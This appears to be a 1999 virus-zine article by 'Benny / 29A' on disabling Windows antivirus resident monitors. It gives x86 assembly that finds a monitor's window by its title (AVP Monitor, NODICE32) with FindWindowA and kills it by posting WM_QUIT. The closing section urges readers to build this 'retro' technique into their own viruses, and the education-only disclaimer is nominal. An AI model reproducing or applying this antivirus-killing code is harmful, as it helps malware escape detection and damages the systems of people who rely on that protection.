ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÚÄ How to k!ll some AV monitors Ä¿ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ³ by ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÀÄÄÄÄÄÄÄÄÄÄ Benny / 29A ÄÄÄÄÄÄÄÄÄÙ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 1. Disclamer ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 2. Foreword ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Resident shields (monitors) r resident programs used to catch viruses. Monitors r activated, when executable files (usually) r opened, closed, executed, etc... Virus can be cought by monitor not only when infected file is being executing, but also when file is being copying. This on-line virus security is very efficent and many stupid users have installed some monitor. I will discuss here, how to deactivate some AV monitors for Win32. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 3. Principes of deactivating ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Oppositely to DOS techniques, where u have to use undocumented interrupts or services (and when u have several problems with deactivating in case monitor ain't present in memory), Win32 technique is more powerfull and more logic (and easier, ofcoz). Following technique is based on Windows message management and also stupidity of AVerz. Now a little teory. When u r closing a window, Windows will send message to program, that window is gonna be closed. And becoz Windows r message based operating system, u can send messages perhaps to everything, what exists in Windows. And if we send message "close window" to window, same thing will happen as we click close window button. OK, so we can close every closable window by sending message. And also we can close monitor's window by sending a "close window" message. And as I said, same thing will happen, as "close window" button will be pressed. It can't be easier... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 4. Deactivting AV monitors ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Firstly we have to find window, which will we close. We will use FindWindowA API: wAVP db 'AVP Monitor',0 ;window title ... mov eax, offset wAVP ;window title push eax ;push parameter cdq ;EDX=0 push edx ;window class - NULL call FindWindowA ;find window xchg eax, ecx ;swap EAX with ECX jecxz quit ;if ECX=0, quit If AVP monitor window exists, we have window handle in EAX register. Otherwise, EAX is NULL. We will use that handle to send close message: push edx ;NULL parameter push edx ;NULL parameter push 12h ;WM_QUIT message push ecx ;window handle call PostMessageA ;send message! And AVP is away! U can close ofcoz many other AV monitors, such as NODICE32, etc... All u need to know is window title. But its very easy to find it. Just open the AV window where is placed button to close it and u got it! But don't expect it will work with AVs, which use special VxD/SyS/WdM driver(s) to provide AV chex (AVG, for instance). It will work with AVs, at which is after closing window all monitor's components erased from memory. ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 5. Closin' ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ Every gewd virus should contain some retro technique. And ability to disable AV monitor is very good retro technique, so don't forget it and use it in your own virus. Last note: When I finished this article, Darkman told me that similar article already exists on Virogen's page. I decided to publish it with following note. I didn't steal this article. ÚÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³ Benny / 29A, 1999 º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ